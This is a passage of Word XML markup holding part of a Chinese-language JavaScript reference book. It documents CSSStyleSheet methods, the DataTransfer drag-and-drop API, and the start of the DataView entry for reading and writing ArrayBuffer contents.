        <w:t>。（注意，本参考中的</w:t>
      </w:r>
      <w:r>
        <w:t>CSSRule</w:t>
      </w:r>
      <w:r>
        <w:t>条目仅用文档描述样式规则，没有</w:t>
      </w:r>
      <w:r>
        <w:t>@imp</w:t>
      </w:r>
      <w:r>
        <w:t>ort</w:t>
      </w:r>
      <w:r>
        <w:t>规则。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly CSSStyleSheet parentStyleSheet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>引入当前样式表的样式表，如果当前样式表直接包含在文档中则此属性值为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly string title</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>样式表的标题，如果指定的话。标题可以通过当前样式表对应的＜</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>＞或＜</w:t>
      </w:r>
      <w:r>
        <w:t>link</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的</w:t>
      </w:r>
      <w:r>
        <w:t>title</w:t>
      </w:r>
      <w:r>
        <w:t>属性来设置。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly string type</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>样式表的</w:t>
      </w:r>
      <w:r>
        <w:t>MIME</w:t>
      </w:r>
      <w:r>
        <w:t>类型。</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>样式表的类型为</w:t>
      </w:r>
      <w:r>
        <w:t>"text/css"</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 xml:space="preserve">void deleteRule(unsigned long </w:t>
      </w:r>
      <w:r>
        <w:t>index)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>本方法从</w:t>
      </w:r>
      <w:r>
        <w:t>cssRule</w:t>
      </w:r>
      <w:r>
        <w:t>数组中删除指定</w:t>
      </w:r>
      <w:r>
        <w:t>index</w:t>
      </w:r>
      <w:r>
        <w:t>的规则。在</w:t>
      </w:r>
      <w:r>
        <w:t>IE8</w:t>
      </w:r>
      <w:r>
        <w:t>及更早版本中，相同功能的方法为</w:t>
      </w:r>
      <w:r>
        <w:t>removeRule()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned long insertRule(string rule,unsigned long index)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>本方法在当前样式表的</w:t>
      </w:r>
      <w:r>
        <w:t>cssRule</w:t>
      </w:r>
      <w:r>
        <w:t>数组指定</w:t>
      </w:r>
      <w:r>
        <w:t>index</w:t>
      </w:r>
      <w:r>
        <w:t>处输入（或追加）一条新的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">CSS </w:t>
      </w:r>
      <w:r>
        <w:t>rule</w:t>
      </w:r>
      <w:r>
        <w:t>（定义选择器和由花括号包着的样式的一个字符串）。在</w:t>
      </w:r>
      <w:r>
        <w:t>IE8</w:t>
      </w:r>
      <w:r>
        <w:t>及更早版本中，对应的方法为</w:t>
      </w:r>
      <w:r>
        <w:t>addRule()</w:t>
      </w:r>
      <w:r>
        <w:t>，该方法需将选择器及格式字符串（没有花括号）作为两个独立的参数传入，再将索引作为第三个参数传递。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="806" w:name="DataTransfer"/>
      <w:r>
        <w:t>DataTransfer</w:t>
      </w:r>
      <w:bookmarkEnd w:id="806"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>通过拖放传递数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>用户进行拖放操作时，拖动源（</w:t>
      </w:r>
      <w:r>
        <w:t>drag source</w:t>
      </w:r>
      <w:r>
        <w:t>）或放置目标（</w:t>
      </w:r>
      <w:r>
        <w:t>drop target</w:t>
      </w:r>
      <w:r>
        <w:t>）（或两者皆有，如果它们都在浏览器窗口中）将触发一系列事件，这些事件都包含其</w:t>
      </w:r>
      <w:r>
        <w:t>dataTransfer</w:t>
      </w:r>
      <w:r>
        <w:t>属性（参见</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>指向一个</w:t>
      </w:r>
      <w:r>
        <w:t>DataTransfer</w:t>
      </w:r>
      <w:r>
        <w:t>对象的事件对象。</w:t>
      </w:r>
      <w:r>
        <w:t>Dat</w:t>
      </w:r>
      <w:r>
        <w:t>aTransfer</w:t>
      </w:r>
      <w:r>
        <w:t>对象是所有拖放操作的中心对象：拖动源将要传输的数据存储在其中，放置目标将传输的数据从中取出。除此之外，</w:t>
      </w:r>
      <w:r>
        <w:t>DataTransfer</w:t>
      </w:r>
      <w:r>
        <w:t>对象还管理拖动源与放置目标之间的一个协商，决定当前拖放是一次复制、移动还是链接操作。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这儿描述的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>最初是微软为</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>创建的，现在其他浏览器也多少实现了一部分。</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>将基本的</w:t>
      </w:r>
      <w:r>
        <w:t>IE API</w:t>
      </w:r>
      <w:r>
        <w:t>作为标准。在本书准备出版时，</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>定义了</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>的一个新版本，其中将</w:t>
      </w:r>
      <w:r>
        <w:t>items</w:t>
      </w:r>
      <w:r>
        <w:t>属性作为</w:t>
      </w:r>
      <w:r>
        <w:t>DataTransferItem</w:t>
      </w:r>
      <w:r>
        <w:t>对象的一个类数组对象。这个</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>很吸引人也很合理，但由于现</w:t>
      </w:r>
      <w:r>
        <w:t>在还没有浏览器实现它，因此这儿没有描述它们的文档。下面是在当前各大浏览器中（基本上）都能工作的特性。关于这个古怪的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>的更多讨论可参考</w:t>
      </w:r>
      <w:r>
        <w:t>17.7</w:t>
      </w:r>
      <w:r>
        <w:t>节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string dropEffect</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个属性定义当前对象表示的数据传送的类型，它的值必须为</w:t>
      </w:r>
      <w:r>
        <w:t>"none"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"copy"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"move"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"copy"</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>"link"</w:t>
      </w:r>
      <w:r>
        <w:t>之一。一般情况下，放置目标会通过</w:t>
      </w:r>
      <w:r>
        <w:t>dragenter</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>dragover</w:t>
      </w:r>
      <w:r>
        <w:t>事件设置这个属性。用户拖曳</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>时如果按住了辅助键也可能影响到这个属性的值，不过这与平台有关。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string effectAllowed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个属性定义了当前拖放操作允许的复制、移动、链接操作的组合。它通常由拖动源设置并响应</w:t>
      </w:r>
      <w:r>
        <w:t>dragstart</w:t>
      </w:r>
      <w:r>
        <w:t>事件。允许的值有</w:t>
      </w:r>
      <w:r>
        <w:t>"none"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"copy"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"copyLink"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"copyMove"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"link"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"linkMove"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"move"</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>"all"</w:t>
      </w:r>
      <w:r>
        <w:t>。（为便于记忆，注意那些定义两个操作的选项，操作名总是按字母顺序排序。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly File[]fles</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果正在拖动的数据是一个或多个文件，这个属性将设置为一个由文件对象组成的数组或类数组对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly string[]types</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这是一</w:t>
      </w:r>
      <w:r>
        <w:t>个类数组对象字符串，指定当前</w:t>
      </w:r>
      <w:r>
        <w:t>DataTransfer</w:t>
      </w:r>
      <w:r>
        <w:t>对象中存储的数据（如果拖动源在浏览器中就使用</w:t>
      </w:r>
      <w:r>
        <w:t>setData()</w:t>
      </w:r>
      <w:r>
        <w:t>，如果在浏览器之外就使用其他机制）的</w:t>
      </w:r>
      <w:r>
        <w:t>MIME</w:t>
      </w:r>
      <w:r>
        <w:t>类型。保存这些类型的类数组对象应该有一个</w:t>
      </w:r>
      <w:r>
        <w:t>contains()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，用于测试一个特定的字符串是否存在。有些浏览器仅使这个对象是一个真正的数组，然而，在这样的情况下，也可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>indexOf()</w:t>
      </w:r>
      <w:r>
        <w:t>方法代替。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void addElement(Element element)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法告诉浏览器在生成用户可见的拖动视觉效果时使用</w:t>
      </w:r>
      <w:r>
        <w:t>element</w:t>
      </w:r>
      <w:r>
        <w:t>。这个方法一般</w:t>
      </w:r>
      <w:r>
        <w:t>由拖动源调用，在有些浏览器中它可能没有实现或没有效果。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void clearData([string format])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>移除之前由</w:t>
      </w:r>
      <w:r>
        <w:t>setData()</w:t>
      </w:r>
      <w:r>
        <w:t>设置的指定</w:t>
      </w:r>
      <w:r>
        <w:t>format</w:t>
      </w:r>
      <w:r>
        <w:t>的数据。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string getData(string format)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>以指定的</w:t>
      </w:r>
      <w:r>
        <w:t>format</w:t>
      </w:r>
      <w:r>
        <w:t>返回传送的数据。如果</w:t>
      </w:r>
      <w:r>
        <w:t>format</w:t>
      </w:r>
      <w:r>
        <w:t>为（忽略大小写的）</w:t>
      </w:r>
      <w:r>
        <w:t>"text"</w:t>
      </w:r>
      <w:r>
        <w:t>，则使用</w:t>
      </w:r>
      <w:r>
        <w:t>"text/plain"</w:t>
      </w:r>
      <w:r>
        <w:t>代替，如果为（忽略大小写的）</w:t>
      </w:r>
      <w:r>
        <w:t>"url"</w:t>
      </w:r>
      <w:r>
        <w:t>，则使用</w:t>
      </w:r>
      <w:r>
        <w:t>"text/url-list"</w:t>
      </w:r>
      <w:r>
        <w:t>代替。这个方法在拖放操作结束时由放置目标调用，以响应</w:t>
      </w:r>
      <w:r>
        <w:t>drop</w:t>
      </w:r>
      <w:r>
        <w:t>事件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void se</w:t>
      </w:r>
      <w:r>
        <w:t>tData(string format,string data)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>定义要传送的</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>以及数据的</w:t>
      </w:r>
      <w:r>
        <w:t>MIME</w:t>
      </w:r>
      <w:r>
        <w:t>类型</w:t>
      </w:r>
      <w:r>
        <w:t>format</w:t>
      </w:r>
      <w:r>
        <w:t>。拖动源在拖放操作开始时调用这个方法，以响应</w:t>
      </w:r>
      <w:r>
        <w:t>dragstart</w:t>
      </w:r>
      <w:r>
        <w:t>事件。这个方法不能从任何其他事件处理程序调用。如果拖动源的数据在多种格式下可</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>用，那么它可以多次调用这个方法，以便注册每一种支持的格式的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>void setDragImage(Element image,long x,long y)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法指定一个</w:t>
      </w:r>
      <w:r>
        <w:t>image</w:t>
      </w:r>
      <w:r>
        <w:t>（一般为一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>img</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素），用于在拖动时向用户显示一种可视效果。</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:t>坐标给定图片相对于鼠标指针的偏移量。这个方法只能被拖动源调用，以响应</w:t>
      </w:r>
      <w:r>
        <w:t>dragstart</w:t>
      </w:r>
      <w:r>
        <w:t>事件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="807" w:name="DataView"/>
      <w:r>
        <w:t>DataView</w:t>
      </w:r>
      <w:bookmarkEnd w:id="807"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>从</w:t>
      </w:r>
      <w:r>
        <w:t>ArrayBuffer</w:t>
      </w:r>
      <w:r>
        <w:t>中读写内容</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ArrayBufferView</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>DataView</w:t>
      </w:r>
      <w:r>
        <w:t>是包装一个</w:t>
      </w:r>
      <w:r>
        <w:t>ArrayBuffer</w:t>
      </w:r>
      <w:r>
        <w:t>（或</w:t>
      </w:r>
      <w:r>
        <w:t>ArrayBufferr</w:t>
      </w:r>
      <w:r>
        <w:t>的一个区域）的</w:t>
      </w:r>
      <w:r>
        <w:t>ArrayBufferView</w:t>
      </w:r>
      <w:r>
        <w:t>，它定义读或写对应缓冲区的</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>及</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个字节的有符号和无符号整数以及</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>及</w:t>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>个字节的浮点数的方法。这些方法同时支持大端</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>big-endian</w:t>
      </w:r>
      <w:r>
        <w:t>）和小端（</w:t>
      </w:r>
      <w:r>
        <w:t>little-endian</w:t>
      </w:r>
      <w:r>
        <w:t>）字节顺序。也可参考</w:t>
      </w:r>
      <w:r>
        <w:t>TypedArray</w:t>
      </w:r>
      <w:r>
        <w:t>。</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lastRenderedPageBreak/>
        <w:t>new DataView(ArrayBuffer buffer,[unsigned long byteOffset],[unsigned long byteLength])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个构造函数创建一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>DataView</w:t>
      </w:r>
      <w:r>
        <w:t>对象，允许读或写访问</w:t>
      </w:r>
      <w:r>
        <w:t>buffer</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>buffer</w:t>
      </w:r>
      <w:r>
        <w:t>的一个区域的字节内容。如果只传入一个参数，它将创建整个缓冲区的视图；传入两个参数，它将创建缓冲区的从字节数</w:t>
      </w:r>
      <w:r>
        <w:t>byteOffset</w:t>
      </w:r>
      <w:r>
        <w:t>开始直到结</w:t>
      </w:r>
      <w:r>
        <w:t>尾的视图；传入三个参数时，它将创建一个从</w:t>
      </w:r>
      <w:r>
        <w:t>byteOffset</w:t>
      </w:r>
      <w:r>
        <w:t>开始长度为</w:t>
      </w:r>
      <w:r>
        <w:t>byteLength</w:t>
      </w:r>
      <w:r>
        <w:t>字节的视图。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这些方法或者从基础的</w:t>
      </w:r>
      <w:r>
        <w:t>ArrayBuffer</w:t>
      </w:r>
      <w:r>
        <w:t>中读入一个数值，或者写入一个数值。方法名标出了是读或写的类型。所有读或写超过一个字节的方法都接受一个可选的</w:t>
      </w:r>
      <w:r>
        <w:t>littleEndian</w:t>
      </w:r>
      <w:r>
        <w:t>参数作为最后一个参数，如果这个参数省略或者为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>，将使用大端字节顺序（</w:t>
      </w:r>
      <w:r>
        <w:t>big-endian byte ordering</w:t>
      </w:r>
      <w:r>
        <w:t>），优先读或写最高有效字节（</w:t>
      </w:r>
      <w:r>
        <w:t>most significant byte</w:t>
      </w:r>
      <w:r>
        <w:t>）。如果参数值为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，将使用小端</w:t>
      </w:r>
      <w:r>
        <w:t>字节顺序（</w:t>
      </w:r>
      <w:r>
        <w:t>little-endian byte ordering</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>float getFloat32(unsigned long byteOffset,[boolean littleEndian])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>将从</w:t>
      </w:r>
      <w:r>
        <w:t>byteOffset</w:t>
      </w:r>
      <w:r>
        <w:t>开始的</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个字节解释为一个浮点数并返回这个数字。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>double getFloat64(unsigned long byteOffset,[boolean littleEndian])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将从</w:t>
      </w:r>
      <w:r>
        <w:t>byteOffset</w:t>
      </w:r>
      <w:r>
        <w:t>开始的</w:t>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>个字节解释为一个浮点数并返回这个数字。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
